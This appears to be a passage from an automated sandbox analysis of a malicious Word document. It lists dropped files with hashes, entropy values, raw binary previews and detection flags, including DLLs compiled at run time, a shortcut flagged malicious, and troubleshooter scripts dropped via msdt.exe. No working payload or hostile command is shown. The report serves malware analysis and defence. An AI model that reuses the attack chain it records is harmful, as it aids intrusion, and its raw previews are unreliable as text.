                                                                                                                                                                            SHA-256:E80B4D2EB20B23D5E09B9E05B893E8066B104276DCCA506B132CD684E771DAFA
                                                                                                                                                                            SHA-512:083503C70CBAC9CB0B2E627D89F8B1265E14B551FBEE30A91D03DD1330640289BF831031EFDA5C1C40FB4FFD01913844859C9731E1FEF3B7B16669875B42CA12
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:GIF image data, version 89a, 15 x 15
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):663
                                                                                                                                                                            Entropy (8bit):5.949125862393289
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF
                                                                                                                                                                            MD5:ED3C1C40B68BA4F40DB15529D5443DEC
                                                                                                                                                                            SHA1:831AF99BB64A04617E0A42EA898756F9E0E0BCCA
                                                                                                                                                                            SHA-256:039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A
                                                                                                                                                                            SHA-512:C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:GIF89a....w..!..MSOFFICE9.0.....sRGB......!..MSOFFICE9.0.....msOPMSOFFICE9.0Dn&P3.!..MSOFFICE9.0.....cmPPJCmp0712.........!.......,....................'..;..b...RQ.xx..................,+................................yy..;..b.........................qp.bb..........uv.ZZ.LL.......xw.jj.NN.A@....zz.mm.^_.........yw........yx.xw.RR.,*.++............................................................................................................................................................................................................8....>.......................4567...=..../0123.....<9:.()*+,-.B.@...."#$%&'....... !............C.?....A;<...HT(..;
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.072448993772642
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryPak7Ynqq7PN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                                                                                                                                                                            MD5:05F21B01AE097F357A8B755EF3C55BD3
                                                                                                                                                                            SHA1:8DE3B4DBB8508E997809C3740B9F0D4D05A88792
                                                                                                                                                                            SHA-256:E0C632327D8C7511B6DEBA08CCF9CB9EE397D649DFA38F4F3750811E7DE636FC
                                                                                                                                                                            SHA-512:DE93D06BF8C8F4C9BA5AA02939936FB7A121E9E18D02073FE31562FFF7836E8494F08FC266A987DC65342144E4D3087AE946EEA8A73B3BF95358EA375458157A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.0.i.d.a.0.b.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5120
                                                                                                                                                                            Entropy (8bit):3.7831670724119446
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:6EoPhmKraYZkH8KTibUyxkwjj0JEC+CFSlwYejc1ulta3xq:SDaAkHHoPk8vCueL/K
                                                                                                                                                                            MD5:27B371F8AB9050AA9BFB2DD74009B90D
                                                                                                                                                                            SHA1:73A25B90E1707E89B1E67596F52AB5DA33EA5001
                                                                                                                                                                            SHA-256:D967F8235C80D4E94371E063E38C332CB92F34911943729C630A0CF9C1694185
                                                                                                                                                                            SHA-512:C20C1DBBCEB01DDC0993C2914567F202906A7548596E7EAB1431F49EA6F58AE7FD0DE6F54E9476DE46D1E97F57B8B33B61C8E350C4F5703C3B35962416C2426E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                            Entropy (8bit):3.1130536385099563
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryAak7YnqqGPN5Dlq5J:+RI+ycuZhN+akSGPNnqX
                                                                                                                                                                            MD5:C7C021E4A2191A5585CE10C0E22011E6
                                                                                                                                                                            SHA1:C4C7FDE82C2981297F5FA3640D4E6156ED945D03
                                                                                                                                                                            SHA-256:B8E2AA6CDD97A5889221145A7F9EC30542969CB82D63E1FF2BD54FD6C41E791B
                                                                                                                                                                            SHA-512:8721D8DA68266E6A9CC16C2FDF307CB3ABDABBDF6A0FAA7C60476B0330B2B445E0299DF8641E78D85F0CB5E1EC53706EA02DDAEF2931F304F0742F8B6731CA1D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...x.p.p.v.b.w.u.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                            Entropy (8bit):4.795053279708517
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:GZKqedmYoNKvUTCSH3gR8H8FgwSHwBtkwZYPaSJ365O0ieMjQZamRnIjQK:ZElNK8TCSfHyPtkwZ+vKOjQZnnQ
                                                                                                                                                                            MD5:96675940BC8FEA4904357D87F05E25B6
                                                                                                                                                                            SHA1:F09D66A19ADBF85D9CD6FD41D6BD671DC516C598
                                                                                                                                                                            SHA-256:B2C16B6669CCC85B6C96BD572D8B5EAE14B12C73068480355AC9AE1A0F104A3C
                                                                                                                                                                            SHA-512:3BBCDEDE28C0920A6B6F29135915DC2CA59AEE23854133D48EE1339E223A47366700E92291F772DCFDC9719AE167C1A430A96F199D489B70907CAF1C934DA5B5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:42 2022, mtime=Thu Jun 16 20:20:13 2022, atime=Thu Jun 16 20:19:54 2022, length=520148, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1060
                                                                                                                                                                            Entropy (8bit):4.716831781392583
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:8JIpHT1jU0uElPCH2HFHIiF+WZmfGGkjEjAJ/YLDmPgNDOTx5j4t2Y+xIBjKZm:8JYrFV2iUAJ8AADO9z7aB6m
                                                                                                                                                                            MD5:33785A075627AA0126024E30D72DD180
                                                                                                                                                                            SHA1:C31CA5037CF1385DE28103FA44B2D841368B39A3
                                                                                                                                                                            SHA-256:01A51BF0C3F705D1ACC0F47E85E825754CF92C153AAFC70105F677A4DCD3AFF7
                                                                                                                                                                            SHA-512:55A7F28136BC4BCAE37578D6217E96E3359E29912EA9B2D7CB7F85D2BB9A897FD1F4C806366BA3306F19F773195B30DF9B53F752D44ACD834A3A4C21B897C21A
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview:L..................F.... ...feZ..3....'....B...................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Tt.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..Tt......S....................,...h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..Tt......Y..............>......~.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2......T|. .V3G2PF~1.DOC..P......hT...T|.....h.........................V.3.g.2.P.f.u.7.0.7...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\V3g2Pfu707.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.V.3.g.2.P.f.u.7.0.7...d.o.c.x.........:..,.LB.)...As...`.......X.......878411...........!a..%.H.VZAj................-..!a..%.H.VZAj................-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):82
                                                                                                                                                                            Entropy (8bit):4.8455100909670845
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:bDuMJlrjmZFSmxW4FXJmZFSv:bCgjCFzZCFc
                                                                                                                                                                            MD5:B2346410BF881C384BCAB69773547CF5
                                                                                                                                                                            SHA1:AECF4DEB8E6951D92D2C1AA4EC1903419619AA61
                                                                                                                                                                            SHA-256:A48C6AC2064B5E9EF0864D88D919F0D0462A5E45196452A728E59C7AC1577392
                                                                                                                                                                            SHA-512:B8A69E92B26ECAE535964895E58628AA0BBBEA8F3457C110046AC9F9D3E2C6D6818CB49426877AB6B9A6AABD9FFD9A8AD0E7A1E1FE9106604AA32981E1107744
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[folders]..Templates.LNK=0..V3g2Pfu707.docx.LNK=0..[misc]..V3g2Pfu707.docx.LNK=0..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):3.0687961738583445
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdusscN2ltmklFldkltzl/ln:RtZWQs6X
                                                                                                                                                                            MD5:9C34F698E59E336BB61C5119231A8C09
                                                                                                                                                                            SHA1:ED14C5885E9F418F5D93A15844B3A4AB2AF50155
                                                                                                                                                                            SHA-256:8063CA4B80C0B4B34FB52C641D817CA596DE6E88F00B990CE3FC09D6C07D598C
                                                                                                                                                                            SHA-512:6FEC94749DE432D3CA86F16239BBF1E3E8AC279062A4FBE0D4BCF4F3BF80B9703611F17363A8943A8C2AB9F406BBDE774332AAA3B614FFBE4B56869835D2A0F5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h..........J,y.....^El@.DlT.Dl`.DlDBElZREl.J(y........`)$..................J.y.........)$.....
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                            Entropy (8bit):3.1182093265357653
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Rl/ZdusscN2ltmklilzkltzl/ln:RtZWQsGMX
                                                                                                                                                                            MD5:6B3FBED7E6A68126551A4EF251E1F4CE
                                                                                                                                                                            SHA1:EF42D8B8FFD2915B2193D46E1E3D191ADA088913
                                                                                                                                                                            SHA-256:9FC6E91279CB4D343306D14429690C873593C6A7D65144C7EBFF86AD7FC2FC9E
                                                                                                                                                                            SHA-512:7840393BF7F8C8AFC2B31E95E3FA43999B01289C0BCEB08FBF6AE748FFD22AD54A98058ADF746879BED6037120331BE6AAD9E1467F883431597D7D6D78007C8B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.pratesh................................................p.r.a.t.e.s.h..........J,y.....^El@.DlT.Dl`.DlDBElZREl.J(y........`)$..................J.y.........)$.....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):24702
                                                                                                                                                                            Entropy (8bit):4.37978533849437
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                            MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                            SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                            SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                            SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):66560
                                                                                                                                                                            Entropy (8bit):6.926109943059805
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                            MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                            SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                            SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                            SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: 5YMh6S8QVr.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: ZDhoKQk8G6.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: TranQuangDai.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: 68101181_048154.img, Detection: malicious, Browse
                                                                                                                                                                            • Filename: doc782.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: doc1712.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: R346ltaP9w.rtf, Detection: malicious, Browse
                                                                                                                                                                            • Filename: VIP Invitation to Doha Expo 2023.docx, Detection: malicious, Browse
                                                                                                                                                                            • Filename: WykHEO9BQN.rtf, Detection: malicious, Browse
                                                                                                                                                                            • Filename: lol666 (2).bat, Detection: malicious, Browse
                                                                                                                                                                            • Filename: EISPv0c56U.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: mjpoc_slide.doc, Detection: malicious, Browse
                                                                                                                                                                            • Filename: 05-2022-0438.doc, Detection: malicious, Browse
                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):50242
                                                                                                                                                                            Entropy (8bit):4.932919499511673
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                            MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                            SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                            SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                            SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16946
                                                                                                                                                                            Entropy (8bit):4.860026903688885
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                            MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                            SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                            SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                            SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):453
                                                                                                                                                                            Entropy (8bit):4.983419443697541
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                            MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                            SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                            SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                            SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6650
                                                                                                                                                                            Entropy (8bit):3.6751460885012333
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                            MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                            SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                            SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                            SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
